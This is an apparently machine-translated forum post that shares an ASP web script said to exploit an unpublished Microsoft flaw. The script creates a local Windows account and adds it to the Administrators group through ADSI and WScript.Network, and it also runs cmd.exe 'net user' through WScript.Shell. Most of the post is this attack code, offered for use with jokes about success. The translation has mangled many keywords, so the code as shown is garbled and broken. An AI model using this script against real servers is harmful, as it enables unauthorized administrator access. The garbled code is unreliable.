Adicionado Super Usuário Código .asp [tela azul original, Kevin Melhoria, MS Vulnerabilidade não publicada

Código .asp do Super Usuário adicionado [Original da tela azul, Kevin Melhoria, MS Vulnerabilidade não publicada]

Autor: Tela Blue, Artigo de Kevin Fonte: Ponto de congelamento Extreme

Na verdade, Kevin e eu testamos no meu frango na semana passada, e Hippo Epic. O resultado foi que os usuários do grupo administradores foram adicionados com sucesso sob permissões de usuário (embora eu não possa acreditar nos meus olhos).

A última vez que Kevin não disse nada, eu não ousei postá -lo ... agora eu o vi postando no blog dele, então o transferi (foi um pouco melhor do que quando o testei da última vez e adicionei um formulário). Agora tenho sorte de todos `` `

De qualquer forma, o código está correto, mas raramente consegue, depende da sorte. . Haha, próximo passo, quero integrá -lo ao oceano. Ei-hey.

A cópia do código é a seguinte:

<head> .NETWORK Objeto Script Ferramenta de Exploração de Aperfeiçoamento de Scripts </head>

<formaction = "userAdd.asp" Método = post>

Usuário: <inputname = "nome de usuário" type = "text" value = "kevin1986"> <br>

Senha: <inputName = "passwd" type = "senha"> <br>

<inputType = "submeter" value = "add">

</morm>

<%@codePage = 936

OnErrorReSumenext

ifRequest.Servervariables ("Remote_addr") <> "127.0.0.1" então

Response.Write "IP! Sn0Tright"

outro

ifRequest ("nome de usuário") <> "" então

nome de usuário = solicitação ("nome de usuário")

passwd = request ("passwd")

Response.Expires = 0

Session.timeout = 50

Server.scriptTimeout = 3000

setlp = server.createObject ("wscript.network")

oz = "winnt: //" & lp.computername

Setob = getObject (oz)

SENTOE = GetObject (oz & "/Administradores, Grupo")

Setod = ob.create ("user", nome de usuário)

od.setPasswordPasswd

Od.setInfo

oe.addoz & "/" e nome de usuário

iferrThen

Response.Write "Ei ~~ Você não deve comprar 6+1 hoje ... É melhor economizar 2 yuan para comprar uma garrafa de Coca -Cola ..."

outro

ifinstr (server.createObject ("wscript.shell"). Exec ("cmd.exe/cnetUser" e userrame.stdout.readall), "Último login")> 0hen

Response.Write "Embora não haja erro, parece que ele não foi estabelecido com sucesso. Você deve estar muito deprimido".

outro

Response.Write "OMG!" E a conta de nome de usuário e "realmente se tornou! Esta é uma brecha desconhecida. 5.000.000RMB é sua".

endif

endif

outro

Response.Write "Por favor, digite o nome de usuário"

endif

endif

%>

Artigos que podem ser de interesse para você:

Rejeite o sistema de gerenciamento de host virtual extra-estrela, Super Usuário FreeHostrunat Remote Desktop, Melhore o sistema de segurança, vários métodos de adição de super usuário ocultos, recupere a senha do super usuário do Redhat Linux 7.2, método de adicionar super usuário a usuários comuns.